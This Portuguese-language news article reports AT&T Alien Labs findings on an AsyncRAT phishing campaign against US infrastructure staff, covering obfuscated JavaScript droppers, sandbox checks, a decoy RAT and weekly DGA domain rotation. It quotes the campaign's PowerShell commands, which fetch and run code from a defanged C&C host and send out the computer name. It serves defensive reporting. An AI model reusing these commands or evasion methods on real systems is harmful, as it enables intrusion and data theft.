Uma campanha AsyncRAT teve como alvo funcionários de infraestrutura dos EUA

Início / Tecnologia da Informação / Uma campanha AsyncRAT teve como alvo funcionários de infraestrutura dos EUA
Uma campanha AsyncRAT teve como alvo funcionários de infraestrutura dos EUA

Nos últimos 11 meses, um grupo tem como alvo funcionários de várias empresas com e-mails de phishing que distribuem um programa de trojan de código aberto chamado AsyncRAT. Os alvos incluíam empresas que gerem infraestruturas essenciais nos EUA.

De acordo com a divisão de segurança cibernética Alien Labs da AT&T, a infraestrutura de comando e controle (C&C) dos invasores usa um algoritmo de geração de domínio (DGA) para alternar entre um grande número de domínios para dificultar o bloqueio de tráfego. Eles sempre geram novas amostras da ferramenta maliciosa para evitar a detecção. Os pesquisadores identificaram mais de 300 amostras e 100 domínios associados a esta campanha.

“AsyncRAT é uma ferramenta de acesso remoto de código aberto lançada em 2019 e ainda está disponível no Github”, disseram os pesquisadores em seu relatório. “Como acontece com qualquer ferramenta de acesso remoto, ela pode ser aproveitada como um trojan de acesso remoto (RAT), especialmente neste caso em que seu acesso e uso são gratuitos. Por esse motivo, é um dos RATs mais utilizados; seus elementos característicos incluem keylogging, técnicas de exfiltração e/ou preparação de acesso inicial para entrega final da carga útil.”

Não é incomum que até mesmo agentes de ameaças sofisticados usem estruturas e ferramentas de malware de código aberto. Eles oferecem vários benefícios, como baixos custos de desenvolvimento em comparação com ferramentas personalizadas e negação plausível, uma vez que as ferramentas não estão associadas a um único ator. Na verdade, o próprio AsyncRAT foi usado em 2022 por um grupo APT que a empresa de segurança Trend Micro rastreia como Earth Berberoka ou GamblingPuppet.

Leia também: CISA adiciona vulnerabilidade corrigida do servidor MS SharePoint ao catálogo KEV

Scripts de entrega de malware altamente ofuscados

Os e-mails de phishing vistos pela Alien Labs e outros pesquisadores incluindo Igal Lytzki da Microsoft usou uma técnica de sequestro de threads para direcionar os usuários a uma página de phishing, que eventualmente derrubou um arquivo JavaScript (.js) nos computadores dos usuários.

Se aberto no Bloco de Notas, o script contém muitas palavras aleatórias em inglês que são comentadas, embora variantes que usavam caracteres sânscritos também tenham sido relatadas no passado por outros pesquisadores como parte de outras campanhas. O script é altamente ofuscado com funções que ocultam e extraem o código malicioso real de diferentes partes do arquivo. O objetivo do script é baixar a carga útil do segundo estágio de uma URL, que é codificada usando uma cifra personalizada e valores decimais em vez de caracteres ASCII.

A carga útil é outro script codificado escrito em PowerShell que é executado diretamente na memória sem ser salvo no disco com um “conhost –headless powershell iex(curl -useb sduyvzep[.]comando top/1.php?hash=)”. O domínio do servidor C&C é alternado periodicamente.

O script do PowerShell executa outro script do PowerShell invocando o comando abaixo: 

iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”)

Isso envia algumas informações ao servidor C&C, como o nome do host do computador e uma variável chamada $wiqnfex que indica a probabilidade do computador ser uma máquina virtual ou sandbox. Este valor é definido após a primeira execução de algumas verificações no adaptador da placa gráfica do sistema e no BIOS, que seriam emulados em uma VM.

Se o servidor C&C determinar que $wiqnfex indica um destino válido, o servidor implantará AsyncRAT. Se o valor da variável indicar uma possível VM ou sandbox, ele redireciona a solicitação para o Google ou para um script PowerShell diferente que baixa e inicia um RAT chamariz.

“Quando descompilado, o RAT é na verdade uma distração para qualquer pesquisador que esteja investigando a campanha”, disseram os pesquisadores do Alien Lab. “A amostra é uma isca feita para se parecer com um RAT por vários motivos. O nome do assembly é DecoyClient e a configuração não é criptografada como seria em um exemplo AsyncRAT. Além disso, o exemplo não contém um servidor C&C, apenas endereços de loopback. Além disso, entre os dados a serem exfiltrados para o C&C, está a string ‘LOL’ ou o grupo ‘GOVNO’.”

Leia também: Empresas com impressoras Kyocera estão vulneráveis a ataques de path traversal

Um novo domínio de comando e controle toda semana

Além de randomizar regularmente o código do script e as amostras de malware para evitar a detecção, os invasores também alternam os domínios C&C todas as semanas. No entanto, os pesquisadores do Alien Lab conseguiram fazer engenharia reversa do algoritmo de geração de domínio, que junto com várias outras constantes, como o TLD (.top), registrador e nome da organização usado para registrar os domínios, e foram capazes de encontrar os domínios usados no passado e obter amostras anteriores dos scripts de implantação.

“Observou-se que esses domínios possuem as mesmas características mencionadas anteriormente, com a diferença de terem 15 caracteres”, disseram os pesquisadores. “Isso nos permite dinamizar e encontrar amostras históricas com base no DGA, bem como construir detecções para identificar infraestruturas futuras, apesar de todos os seus esforços para evitar detecções de EDR e estáticas.” O relatório do AT&T Alien Labs inclui assinaturas de detecção para esta campanha que podem ser usadas com o sistema de detecção de intrusão Suricata de código aberto, bem como uma lista de indicadores de comprometimento (IOC) que podem ser usados ​​para construir detecções para outros sistemas.

Leitura relacionada:

Roberto Magalhães

O cérebro editor por trás do Tecnologico.online, é um entusiasta apaixonado por tecnologia. Canaliza sua fascinação para criar conteúdo envolvente e informativo. Sua dedicação à inovação reflete-se nos artigos que produz, abrangendo uma ampla gama de tópicos tecnológicos. Com um olhar atento para as últimas tendências e desenvolvimentos, busca tornar...

Voltar para o blog

Deixe um comentário

Os comentários precisam ser aprovados antes da publicação.